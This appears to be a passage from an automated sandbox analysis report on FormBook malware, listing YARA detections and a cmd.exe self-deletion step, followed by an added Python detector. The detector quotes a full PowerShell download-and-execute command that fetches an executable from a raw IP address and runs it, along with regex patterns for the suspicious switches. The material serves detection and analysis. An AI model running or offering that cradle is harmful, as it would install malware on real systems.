                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.2354005709.0000000000340000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.2354005709.0000000000340000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.2354005709.0000000000340000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.2353725750.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.2353725750.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.2353725750.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:moderate

                                              General

                                              Start time:11:34:12
                                              Start date:12/05/2021
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:/c del 'C:\Users\user\AppData\Roaming\docsc.exe'
                                              Imagebase:0x4a870000
                                              File size:302592 bytes
                                              MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
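
The three powershell.exe entries above all carry the same download-and-execute command line, and the final cmd.exe entry deletes the file that command dropped. The following is an added example (not Joe Sandbox's own code and not part of the report) that shows how a detection would pull the relevant indicators out of those two command lines: the suspicious switch combination the PowerShell_Susp_Parameter_Combo rule looks for, the download URL and drop path from DownloadFile(), the Start-Process target, and the later "del" of the same path. The two command lines are copied from the process list above; the switch list, scoring and function names are this example's own choices. Note that the report shows the scheme as "httP://", so any URL or scheme match has to be case-insensitive, and that powershell.exe accepts any unambiguous prefix of a parameter name, so -NoP, -NonI and -W are matched as prefixes rather than as literal switch names.

```python
import re
from typing import Dict, List

# Command lines copied verbatim from the process list in this report (report data, not constructed).
PS_CMDLINE = (
    r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden "
    r"-ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient)"
    r".DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');"
    r"Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''"
)
CMD_CMDLINE = r"/c del 'C:\Users\user\AppData\Roaming\docsc.exe'"

# powershell.exe accepts any unambiguous prefix of a parameter name, case-insensitively,
# so the switches are matched as prefixes (-NoP, -NonI, -W Hidden, -ep/-ex... bypass).
# Flag names are this example's own labels, not a rule's identifiers.
PS_SWITCHES = [
    ("noprofile", r"-nop(?:rofile)?\b"),
    ("noninteractive", r"-noni(?:nteractive)?\b"),
    ("hidden_window", r"-w(?:indowstyle)?\s+hidden\b"),
    ("execpolicy_bypass", r"-(?:ep|ex\w*)\s+bypass\b"),
]

# The report shows the scheme as "httP://": a case-sensitive "http://" match would miss it.
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)
DOWNLOADFILE_RE = re.compile(r"DownloadFile\(\s*'([^']+)'\s*,\s*'([^']+)'\s*\)", re.IGNORECASE)
START_PROCESS_RE = re.compile(r"Start-Process\s+'([^']+)'", re.IGNORECASE)
DEL_RE = re.compile(r"\bdel\s+(?:'([^']+)'|(\S+))", re.IGNORECASE)


def analyse_powershell(cmdline: str) -> Dict:
    """Flag suspicious switches and extract IOCs (URL, drop path, executed path) from a
    PowerShell command line. A download cradle is reported only when a DownloadFile()
    destination is afterwards handed to Start-Process."""
    flags = [name for name, pat in PS_SWITCHES if re.search(pat, cmdline, re.IGNORECASE)]
    drops = [dest for _url, dest in DOWNLOADFILE_RE.findall(cmdline)]
    executes = START_PROCESS_RE.findall(cmdline)
    executed_drop = {d.lower() for d in drops} & {e.lower() for e in executes}
    return {
        "flags": flags,
        "urls": URL_RE.findall(cmdline),
        "drops": drops,
        "executes": executes,
        "download_cradle": bool(executed_drop),
    }


def classify(result: Dict) -> str:
    """Verdict labels are this example's own; a cradle plus two or more of the
    switches above is treated as the strongest finding."""
    if result["download_cradle"] and len(result["flags"]) >= 2:
        return "download-and-execute cradle"
    if result["flags"]:
        return "suspicious switches"
    return "no finding"


def is_self_delete(cmd_cmdline: str, dropped: List[str]) -> bool:
    """True when a cmd.exe command line deletes a path that an earlier stage dropped,
    the cleanup step seen in the last process entry of this report."""
    m = DEL_RE.search(cmd_cmdline)
    if not m:
        return False
    target = (m.group(1) or m.group(2)).strip().lower()
    return target in {d.lower() for d in dropped}


if __name__ == "__main__":
    ps = analyse_powershell(PS_CMDLINE)
    print(classify(ps), ps)
    print("dropped payload later deleted:", is_self_delete(CMD_CMDLINE, ps["drops"]))
```

Run stand-alone it prints the verdict, the extracted URL and drop path, and confirms that the cmd.exe "/c del" targets the same file PowerShell wrote, which ties the first and last process entries together without relying on the sandbox's process-tree metadata.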

                                              Disassembly

                                              Code Analysis
